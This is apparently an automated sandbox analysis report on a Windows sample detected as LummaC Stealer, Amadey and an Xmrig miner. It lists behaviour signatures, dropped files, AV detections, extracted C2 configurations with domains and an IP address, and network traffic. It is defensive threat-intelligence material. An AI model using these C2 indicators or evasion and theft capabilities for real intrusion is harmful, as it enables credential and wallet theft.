Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1579329
MD5: b54cf9188652a3bfe166d33c542f8ac6
SHA1: 4335fa4d75ab3ba85613d163f8f930d9adf087ce
SHA256: 0f1d1aed639362ce37edde5b4c278555bec835b1a5d3d5b90a7b8bbce0d83b86
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to start a terminal service
Creates files in the system32 config directory
Drops password protected ZIP file
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Leaks process information
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Avira: detection malicious, Label: HEUR/AGEN.1352802
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe Avira: detection malicious, Label: HEUR/AGEN.1352802
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Found malware configuration
Source: 00000006.00000002.2985109960.0000000000361000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp Malware Configuration Extractor: LummaC {"C2 url": ["discokeyus.lat", "crosshuaht.lat", "sustainskelet.lat", "necklacebudi.lat", "energyaffai.lat", "rapeflowwj.lat", "grannyejh.lat", "aspecteirs.lat", "treehoneyi.click"], "Build id": "rAGxSF--load"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe ReversingLabs: Detection: 69%
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 54% Perma Link
Source: file.exe ReversingLabs: Detection: 50%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: rapeflowwj.lat
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: crosshuaht.lat
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: sustainskelet.lat
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: aspecteirs.lat
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: energyaffai.lat
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: necklacebudi.lat
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: discokeyus.lat
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: grannyejh.lat
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: treehoneyi.click
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String decryptor: rAGxSF--load
Source: 1b73492cb0.exe, 0000002D.00000003.2832287597.0000000007546000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_f81a8efa-4

Bitcoin Miner
barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: 48.3.Intel_PTT_EK_Recertification.exe.131c27b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.3.Intel_PTT_EK_Recertification.exe.17227910000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 48.3.Intel_PTT_EK_Recertification.exe.131c27b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.3.Intel_PTT_EK_Recertification.exe.17227910000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000002.2781226927.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2780527209.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2780527209.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2781133472.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.2774998618.0000017227910000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000003.2926529139.00000131C27B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 1808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 5324, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.2774998618.0000017227910000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.2774998618.0000017227910000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.2774998618.0000017227910000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.2774998618.0000017227910000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Google\Chrome\Extensions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Windows Media Player\graph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Windows Media Player\graph\graph.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: 6eea3e30e9.exe, 0000000C.00000003.2674626766.00000247A0680000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000000E.00000002.2987242704.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 0000000E.00000000.2674897514.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000010.00000000.2698018122.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000010.00000002.2986807118.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000026.00000002.2986951366.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000026.00000000.2766666306.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 0000002E.00000002.2987477077.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 0000002E.00000000.2848079975.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: 6eea3e30e9.exe, 0000000C.00000002.2716799079.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000C.00000000.2570471769.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000D.00000002.2738064179.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000D.00000000.2577423521.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: 6eea3e30e9.exe, 0000000C.00000002.2716799079.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000C.00000000.2570471769.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000D.00000002.2738064179.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000D.00000000.2577423521.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000006.00000002.2990887486.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, random[2].exe1.6.dr
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000006.00000002.2990887486.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, random[2].exe1.6.dr
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: 6eea3e30e9.exe, 0000000C.00000003.2674626766.00000247A0680000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000000E.00000002.2987242704.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 0000000E.00000000.2674897514.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000010.00000000.2698018122.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000010.00000002.2986807118.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000026.00000002.2986951366.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000026.00000000.2766666306.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 0000002E.00000002.2987477077.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 0000002E.00000000.2848079975.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Publishers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Comms Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\SolidDocuments Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Packages Jump to behavior
